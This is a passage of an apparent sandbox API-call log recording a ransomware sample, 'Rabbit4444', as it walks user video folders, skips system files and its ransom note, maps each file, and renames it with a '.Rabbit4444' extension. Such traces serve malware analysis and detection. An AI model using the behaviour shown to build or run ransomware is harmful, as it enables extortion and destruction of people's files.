lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43628c0, ftCreationTime.dwHighDateTime=0x1d4cd1c, ftLastAccessTime.dwLowDateTime=0xded32150, ftLastAccessTime.dwHighDateTime=0x1d4cbfd, ftLastWriteTime.dwLowDateTime=0xded32150, ftLastWriteTime.dwHighDateTime=0x1d4cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x67e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VCm0_y.mkv", cAlternateFileName="")) returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="Rabbit4444.exe") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2=".") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="..") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="windows") returned -1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="bootmgr") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="pagefile.sys") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="boot") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="ids.txt") returned 1 [0048.291] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="NTUSER.DAT") returned 1 [0048.292] lstrcpyW (in: lpString1=0x130eb6e, lpString2="VCm0_y.mkv" | out: lpString1="VCm0_y.mkv") returned="VCm0_y.mkv" [0048.292] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\VCm0_y.mkv", dwFileAttributes=0x0) returned 1 [0048.292] lstrlenW (lpString="VCm0_y.mkv") returned 10 [0048.292] lstrlenW (lpString="Rabbit4444") returned 10 [0048.292] lstrcmpiW (lpString1="VCm0_y.mkv", lpString2="Rabbit4444") returned 1 [0048.292] lstrlenW (lpString=".dll") returned 4 [0048.292] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0048.292] lstrlenW (lpString=".lnk") returned 4 [0048.292] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0048.292] lstrlenW (lpString=".ini") returned 4 [0048.292] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0048.292] lstrlenW (lpString=".sys") returned 4 [0048.292] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0048.292] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\VCm0_y.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\vcm0_y.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.292] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.292] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13960292947) returned 1 [0048.292] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=26596) returned 1 [0048.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0048.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0048.292] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6af0, lpName=0x0) returned 0x298 [0048.292] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6af0) returned 0x70000 [0048.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.294] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13960453683) returned 1 [0048.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0048.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0048.294] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.294] CloseHandle (hObject=0x298) returned 1 [0048.294] CloseHandle (hObject=0x278) returned 1 [0048.297] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\tKr\\VCm0_y.mkv.Rabbit4444") returned 48 [0048.298] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\VCm0_y.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\vcm0_y.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\VCm0_y.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\vcm0_y.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0048.298] InterlockedExchangeAdd (in: Addend=0xff618, Value=26608 | out: Addend=0xff618) returned 15640640 [0048.298] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3319 [0048.298] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94517d50, ftCreationTime.dwHighDateTime=0x1d4cc77, ftLastAccessTime.dwLowDateTime=0x8e59d6f0, ftLastAccessTime.dwHighDateTime=0x1d4d36f, ftLastWriteTime.dwLowDateTime=0x8e59d6f0, ftLastWriteTime.dwHighDateTime=0x1d4d36f, nFileSizeHigh=0x0, nFileSizeLow=0x13e2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W681BwserRy_0.avi", cAlternateFileName="W681BW~1.AVI")) returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="Rabbit4444.exe") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2=".") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="..") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="windows") returned -1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="bootmgr") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="pagefile.sys") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="boot") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="ids.txt") returned 1 [0048.298] lstrcmpiW (lpString1="W681BwserRy_0.avi", lpString2="NTUSER.DAT") returned 1 [0048.298] lstrcpyW (in: lpString1=0x130eb6e, lpString2="W681BwserRy_0.avi" | out: lpString1="W681BwserRy_0.avi") returned="W681BwserRy_0.avi" [0048.298] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\W681BwserRy_0.avi", dwFileAttributes=0x0) returned 1 [0048.299] lstrlenW (lpString="W681BwserRy_0.avi") returned 17 [0048.299] lstrlenW (lpString="Rabbit4444") returned 10 [0048.299] lstrcmpiW (lpString1="erRy_0.avi", lpString2="Rabbit4444") returned -1 [0048.299] lstrlenW (lpString=".dll") returned 4 [0048.299] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0048.299] lstrlenW (lpString=".lnk") returned 4 [0048.299] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0048.299] lstrlenW (lpString=".ini") returned 4 [0048.299] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0048.299] lstrlenW (lpString=".sys") returned 4 [0048.299] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0048.299] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\W681BwserRy_0.avi" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\w681bwserry_0.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.299] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.299] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13960982356) returned 1 [0048.299] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=81450) returned 1 [0048.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0048.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0048.299] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14130, lpName=0x0) returned 0x298 [0048.299] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14130) returned 0x70000 [0048.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0048.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0048.302] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13961293223) returned 1 [0048.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0048.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0048.302] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.303] CloseHandle (hObject=0x298) returned 1 [0048.303] CloseHandle (hObject=0x278) returned 1 [0048.306] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\tKr\\W681BwserRy_0.avi.Rabbit4444") returned 55 [0048.306] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\W681BwserRy_0.avi" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\w681bwserry_0.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\W681BwserRy_0.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\w681bwserry_0.avi.rabbit4444"), dwFlags=0x1) returned 1 [0048.306] InterlockedExchangeAdd (in: Addend=0xff618, Value=81456 | out: Addend=0xff618) returned 15667248 [0048.306] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3320 [0048.306] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94517d50, ftCreationTime.dwHighDateTime=0x1d4cc77, ftLastAccessTime.dwLowDateTime=0x8e59d6f0, ftLastAccessTime.dwHighDateTime=0x1d4d36f, ftLastWriteTime.dwLowDateTime=0x8e59d6f0, ftLastWriteTime.dwHighDateTime=0x1d4d36f, nFileSizeHigh=0x0, nFileSizeLow=0x13e2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W681BwserRy_0.avi", cAlternateFileName="W681BW~1.AVI")) returned 0 [0048.307] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0048.307] lstrcpyW (in: lpString1=0x130eb6e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.307] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\tKr\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\tkr\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.307] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.308] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.308] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.309] CloseHandle (hObject=0x278) returned 1 [0048.309] CloseHandle (hObject=0x27c) returned 1 [0048.309] GetCurrentThreadId () returned 0xd98 [0048.309] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6930 [0048.310] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r") returned="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r" [0048.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115688 | out: hHeap=0xe0000) returned 1 [0048.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6928 | out: hHeap=0xe0000) returned 1 [0048.310] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r") returned="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r" [0048.310] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\") returned="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\" [0048.310] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\.BFC0E91B00AE8A0620D3" [0048.310] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.311] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.313] FlushFileBuffers (hFile=0x27c) returned 1 [0048.314] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.314] CloseHandle (hObject=0x27c) returned 1 [0048.315] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r") returned 42 [0048.315] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.315] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab5794b0, ftCreationTime.dwHighDateTime=0x1d4d0a2, ftLastAccessTime.dwLowDateTime=0x20a0cbe0, ftLastAccessTime.dwHighDateTime=0x1d4c7f9, ftLastWriteTime.dwLowDateTime=0xe61d276b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0048.315] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.315] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.315] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.315] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.315] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab5794b0, ftCreationTime.dwHighDateTime=0x1d4d0a2, ftLastAccessTime.dwLowDateTime=0x20a0cbe0, ftLastAccessTime.dwHighDateTime=0x1d4c7f9, ftLastWriteTime.dwLowDateTime=0xe61d276b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.315] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.315] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.315] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.315] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.315] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.315] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe61d276b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe61d276b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe61f871c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.315] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.315] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.315] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88110, ftCreationTime.dwHighDateTime=0x1d4cf8e, ftLastAccessTime.dwLowDateTime=0xc0671e90, ftLastAccessTime.dwHighDateTime=0x1d4c5ab, ftLastWriteTime.dwLowDateTime=0xc0671e90, ftLastWriteTime.dwHighDateTime=0x1d4c5ab, nFileSizeHigh=0x0, nFileSizeLow=0x18deb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l0I0AT.swf", cAlternateFileName="")) returned 1 [0048.315] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="Rabbit4444.exe") returned -1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2=".") returned 1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="..") returned 1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="windows") returned -1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="bootmgr") returned 1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="pagefile.sys") returned -1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="boot") returned 1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="ids.txt") returned 1 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="NTUSER.DAT") returned -1 [0048.316] lstrcpyW (in: lpString1=0x130eb8e, lpString2="l0I0AT.swf" | out: lpString1="l0I0AT.swf") returned="l0I0AT.swf" [0048.316] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\l0I0AT.swf", dwFileAttributes=0x0) returned 1 [0048.316] lstrlenW (lpString="l0I0AT.swf") returned 10 [0048.316] lstrlenW (lpString="Rabbit4444") returned 10 [0048.316] lstrcmpiW (lpString1="l0I0AT.swf", lpString2="Rabbit4444") returned -1 [0048.316] lstrlenW (lpString=".dll") returned 4 [0048.316] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0048.316] lstrlenW (lpString=".lnk") returned 4 [0048.316] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0048.316] lstrlenW (lpString=".ini") returned 4 [0048.316] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0048.316] lstrlenW (lpString=".sys") returned 4 [0048.316] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0048.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\l0I0AT.swf" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\l0i0at.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.316] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.316] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13962723463) returned 1 [0048.317] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=101867) returned 1 [0048.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0048.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0048.317] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x190f0, lpName=0x0) returned 0x298 [0048.317] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x190f0) returned 0x70000 [0048.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0048.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0048.320] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13963078739) returned 1 [0048.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0048.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0048.320] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.321] CloseHandle (hObject=0x298) returned 1 [0048.321] CloseHandle (hObject=0x278) returned 1 [0048.324] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\l0I0AT.swf.Rabbit4444") returned 64 [0048.324] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\l0I0AT.swf" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\l0i0at.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\l0I0AT.swf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\l0i0at.swf.rabbit4444"), dwFlags=0x1) returned 1 [0048.326] InterlockedExchangeAdd (in: Addend=0xff618, Value=101872 | out: Addend=0xff618) returned 15748704 [0048.326] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3323 [0048.326] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc291ff80, ftCreationTime.dwHighDateTime=0x1d4c648, ftLastAccessTime.dwLowDateTime=0x93d5ac20, ftLastAccessTime.dwHighDateTime=0x1d4d352, ftLastWriteTime.dwLowDateTime=0x93d5ac20, ftLastWriteTime.dwHighDateTime=0x1d4d352, nFileSizeHigh=0x0, nFileSizeLow=0x1657a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_cqQP-g.mkv", cAlternateFileName="")) returned 1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="Rabbit4444.exe") returned -1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2=".") returned 1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="..") returned 1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="windows") returned -1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="bootmgr") returned -1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="pagefile.sys") returned -1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="boot") returned -1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="ids.txt") returned -1 [0048.326] lstrcmpiW (lpString1="_cqQP-g.mkv", lpString2="NTUSER.DAT") returned -1 [0048.326] lstrcpyW (in: lpString1=0x130eb8e, lpString2="_cqQP-g.mkv" | out: lpString1="_cqQP-g.mkv") returned="_cqQP-g.mkv" [0048.326] SetFileAttributesW 